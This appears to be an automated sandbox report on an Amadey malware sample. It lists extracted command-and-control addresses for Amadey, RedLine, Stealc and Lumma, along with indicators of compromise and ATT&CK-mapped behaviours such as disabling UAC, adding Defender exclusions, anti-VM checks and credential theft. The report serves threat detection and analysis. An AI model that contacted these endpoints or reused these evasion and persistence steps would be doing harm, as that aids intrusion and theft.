amadey | e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090

Analysis

max time kernel
39s
max time network
112s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
08-05-2024 14:00

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
Size

1.9MB
MD5

d3a7d09173b5bc95c1ec9ae1681e6bdd
SHA1

00d9df9d4221e93dc3e4712867fe6b0778205bd5
SHA256

e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090
SHA512

6052c4df2142a729f5d7fffeb5714705784528ef6383332f4177edfd2589df8b093cc3de0edaeb6e6408055d491a31f8bc2bf94e3a92f5fefca7f5a47018b158
SSDEEP

49152:dBZobBYVI0aSeCE+bqkRIhniByK0C69A1rExOhXBS7qhC:dXwBYSfmmCIgBqC66eO27QC

Malware Config

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Extracted

Family

stealc

http://49.13.229.86

http://185.172.128.150

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

lumma

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral1/memory/1944-359-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral1/files/0x000700000002344b-373.dat	family_zgrat_v1
behavioral1/memory/4984-405-0x0000000000740000-0x0000000000800000-memory.dmp	family_zgrat_v1
behavioral1/memory/5216-796-0x00000193C7260000-0x00000193CAA94000-memory.dmp	family_zgrat_v1
behavioral1/memory/5216-811-0x00000193E6A00000-0x00000193E6B0A000-memory.dmp	family_zgrat_v1
behavioral1/memory/5216-819-0x00000193E6680000-0x00000193E66A4000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 16 IoCs

resource	yara_rule
behavioral1/memory/3036-482-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4708-519-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4148-522-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4960-523-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4960-627-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4708-625-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/3036-624-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4148-626-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4148-662-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4960-663-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4708-661-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/3036-660-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4708-687-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/3036-686-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4960-689-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba
behavioral1/memory/4148-688-0x0000000000400000-0x0000000001DE6000-memory.dmp	family_glupteba

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	vOUAMco7oInyk0QGVUuWyWh9.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral1/files/0x000700000002340c-52.dat	family_redline
behavioral1/memory/1744-68-0x0000000000940000-0x0000000000992000-memory.dmp	family_redline
behavioral1/files/0x000700000002344b-373.dat	family_redline
behavioral1/files/0x000800000002344a-378.dat	family_redline
behavioral1/memory/836-387-0x0000000000AF0000-0x0000000000B42000-memory.dmp	family_redline
behavioral1/memory/4984-405-0x0000000000740000-0x0000000000800000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	vOUAMco7oInyk0QGVUuWyWh9.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	vOUAMco7oInyk0QGVUuWyWh9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
77	3684	rundll32.exe
110	4544	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4584	powershell.exe
5860	powershell.exe
5804	powershell.exe
5716	powershell.exe
5288	powershell.exe
3848	powershell.exe
5828	powershell.exe
5300	powershell.exe
5676	powershell.exe
5472	powershell.exe
5416	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vOUAMco7oInyk0QGVUuWyWh9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vOUAMco7oInyk0QGVUuWyWh9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	explorha.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	file300un.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	RbzpEYFFyd2k3tlJwVJ7WCYu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	NewB.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cI9tNEBK0RqoX7KHh2bxW8Xu.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ag6E9IkWRlr1aIuYwpCv8kFa.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LaGpk2rE4UxKJtLUUp5UDOqL.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0Xgw2FfPoaknycbRn9KTwdHo.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5g3iwGFunDV41aj8dIzzcQnq.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hqCHHqUODEWJyRjE1NrqcQ2X.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qexZ9qTIcTZ4f2Bbj9CCBTgo.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t6qriKzYqU9TCnQTxQ0bMftC.bat	installutil.exe

Executes dropped EXE 30 IoCs

pid	Process
3496	explorha.exe
3032	swiiiii.exe
2016	explorha.exe
1744	jok.exe
2644	swiy.exe
2384	file300un.exe
4956	gold.exe
3036	utNGPg0gpQGWzXempS9Ntqy2.exe
2192	RbzpEYFFyd2k3tlJwVJ7WCYu.exe
4708	qFFwSZOquvgFriDnZOrAi6bC.exe
4148	LPbieoz4f864OQzixQVkp6kB.exe
4960	o39G6AMTz0QzrehN2CQMDgap.exe
912	vOUAMco7oInyk0QGVUuWyWh9.exe
4256	alexxxxxxxx.exe
4984	trf.exe
836	keks.exe
2792	install.exe
4396	NewB.exe
4632	u1ow.0.exe
3160	GameService.exe
2788	GameService.exe
3560	ISetup8.exe
4804	u1ow.1.exe
5000	toolspub1.exe
3672	GameService.exe
3632	GameService.exe
1724	GameService.exe
3588	GameSyncLink.exe
3524	932817.exe
4528	YtrXGKuyCrSuooyxTQECTm8C.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explorha.exe

Loads dropped DLL 6 IoCs

pid	Process
5048	RegAsm.exe
5048	RegAsm.exe
4848	rundll32.exe
3684	rundll32.exe
4544	rundll32.exe
3524	932817.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0007000000023440-326.dat	themida
behavioral1/memory/912-334-0x0000000140000000-0x00000001408F4000-memory.dmp	themida
behavioral1/memory/912-524-0x0000000140000000-0x00000001408F4000-memory.dmp	themida

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	vOUAMco7oInyk0QGVUuWyWh9.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vOUAMco7oInyk0QGVUuWyWh9.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
44	pastebin.com
45	pastebin.com
147	bitbucket.org
148	bitbucket.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
90	api.myip.com
91	api.myip.com
94	ipinfo.io
97	ipinfo.io

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	vOUAMco7oInyk0QGVUuWyWh9.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	vOUAMco7oInyk0QGVUuWyWh9.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	vOUAMco7oInyk0QGVUuWyWh9.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	vOUAMco7oInyk0QGVUuWyWh9.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4124	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
3496	explorha.exe
2016	explorha.exe
912	vOUAMco7oInyk0QGVUuWyWh9.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3032 set thread context of 4708	3032	swiiiii.exe	83
PID 2644 set thread context of 5048	2644	swiy.exe	91
PID 4956 set thread context of 2224	4956	gold.exe	96
PID 2384 set thread context of 2100	2384	file300un.exe	99
PID 4256 set thread context of 1944	4256	alexxxxxxxx.exe	118

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorha.job	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4764	sc.exe
4864	sc.exe
3100	sc.exe
1732	sc.exe
5260	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
836	3032	WerFault.exe	79
4388	4256	WerFault.exe	115
4712	2192	WerFault.exe	110
4404	5000	WerFault.exe	142
3744	3560	WerFault.exe	138

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1ow.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1ow.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1ow.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4688	schtasks.exe
4576	schtasks.exe
840	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4124	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
4124	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
3496	explorha.exe
3496	explorha.exe
2016	explorha.exe
2016	explorha.exe
5048	RegAsm.exe
5048	RegAsm.exe
5048	RegAsm.exe
5048	RegAsm.exe
4584	powershell.exe
4584	powershell.exe
3684	rundll32.exe
3684	rundll32.exe
3684	rundll32.exe
3684	rundll32.exe
3684	rundll32.exe
3684	rundll32.exe
1744	jok.exe
3684	rundll32.exe
3684	rundll32.exe
3684	rundll32.exe
3684	rundll32.exe
3848	powershell.exe
3848	powershell.exe
1744	jok.exe
1744	jok.exe
1744	jok.exe
1744	jok.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2100	installutil.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	1744	jok.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	4984	trf.exe
Token: SeBackupPrivilege	4984	trf.exe
Token: SeSecurityPrivilege	4984	trf.exe
Token: SeSecurityPrivilege	4984	trf.exe
Token: SeSecurityPrivilege	4984	trf.exe
Token: SeSecurityPrivilege	4984	trf.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
4124	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe

Suspicious use of SendNotifyMessage 7 IoCs

pid	Process
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe
4804	u1ow.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4124 wrote to memory of 3496	4124	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe	78
PID 4124 wrote to memory of 3496	4124	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe	78
PID 4124 wrote to memory of 3496	4124	e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe	78
PID 3496 wrote to memory of 3032	3496	explorha.exe	79
PID 3496 wrote to memory of 3032	3496	explorha.exe	79
PID 3496 wrote to memory of 3032	3496	explorha.exe	79
PID 3032 wrote to memory of 2732	3032	swiiiii.exe	82
PID 3032 wrote to memory of 2732	3032	swiiiii.exe	82
PID 3032 wrote to memory of 2732	3032	swiiiii.exe	82
PID 3032 wrote to memory of 4708	3032	swiiiii.exe	83
PID 3032 wrote to memory of 4708	3032	swiiiii.exe	83
PID 3032 wrote to memory of 4708	3032	swiiiii.exe	83
PID 3032 wrote to memory of 4708	3032	swiiiii.exe	83
PID 3032 wrote to memory of 4708	3032	swiiiii.exe	83
PID 3032 wrote to memory of 4708	3032	swiiiii.exe	83
PID 3032 wrote to memory of 4708	3032	swiiiii.exe	83
PID 3032 wrote to memory of 4708	3032	swiiiii.exe	83
PID 3032 wrote to memory of 4708	3032	swiiiii.exe	83
PID 3496 wrote to memory of 1744	3496	explorha.exe	87
PID 3496 wrote to memory of 1744	3496	explorha.exe	87
PID 3496 wrote to memory of 1744	3496	explorha.exe	87
PID 3496 wrote to memory of 2644	3496	explorha.exe	88
PID 3496 wrote to memory of 2644	3496	explorha.exe	88
PID 3496 wrote to memory of 2644	3496	explorha.exe	88
PID 2644 wrote to memory of 3140	2644	swiy.exe	90
PID 2644 wrote to memory of 3140	2644	swiy.exe	90
PID 2644 wrote to memory of 3140	2644	swiy.exe	90
PID 2644 wrote to memory of 5048	2644	swiy.exe	91
PID 2644 wrote to memory of 5048	2644	swiy.exe	91
PID 2644 wrote to memory of 5048	2644	swiy.exe	91
PID 2644 wrote to memory of 5048	2644	swiy.exe	91
PID 2644 wrote to memory of 5048	2644	swiy.exe	91
PID 2644 wrote to memory of 5048	2644	swiy.exe	91
PID 2644 wrote to memory of 5048	2644	swiy.exe	91
PID 2644 wrote to memory of 5048	2644	swiy.exe	91
PID 2644 wrote to memory of 5048	2644	swiy.exe	91
PID 3496 wrote to memory of 2384	3496	explorha.exe	93
PID 3496 wrote to memory of 2384	3496	explorha.exe	93
PID 3496 wrote to memory of 4956	3496	explorha.exe	95
PID 3496 wrote to memory of 4956	3496	explorha.exe	95
PID 3496 wrote to memory of 4956	3496	explorha.exe	95
PID 4956 wrote to memory of 2224	4956	gold.exe	96
PID 4956 wrote to memory of 2224	4956	gold.exe	96
PID 4956 wrote to memory of 2224	4956	gold.exe	96
PID 4956 wrote to memory of 2224	4956	gold.exe	96
PID 4956 wrote to memory of 2224	4956	gold.exe	96
PID 4956 wrote to memory of 2224	4956	gold.exe	96
PID 4956 wrote to memory of 2224	4956	gold.exe	96
PID 4956 wrote to memory of 2224	4956	gold.exe	96
PID 4956 wrote to memory of 2224	4956	gold.exe	96
PID 2384 wrote to memory of 4584	2384	file300un.exe	97
PID 2384 wrote to memory of 4584	2384	file300un.exe	97
PID 2384 wrote to memory of 2100	2384	file300un.exe	99
PID 2384 wrote to memory of 2100	2384	file300un.exe	99
PID 2384 wrote to memory of 2100	2384	file300un.exe	99
PID 2384 wrote to memory of 2100	2384	file300un.exe	99
PID 2384 wrote to memory of 2100	2384	file300un.exe	99
PID 2384 wrote to memory of 2100	2384	file300un.exe	99
PID 2384 wrote to memory of 2100	2384	file300un.exe	99
PID 2384 wrote to memory of 2100	2384	file300un.exe	99
PID 3496 wrote to memory of 4848	3496	explorha.exe	103
PID 3496 wrote to memory of 4848	3496	explorha.exe	103
PID 3496 wrote to memory of 4848	3496	explorha.exe	103
PID 4848 wrote to memory of 3684	4848	rundll32.exe	104

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe
"C:\Users\Admin\AppData\Local\Temp\e050a603894a4abf9550963f3dc4ae98cc94c05fa004397e31a2b8a741f0c090.exe"
1⤵
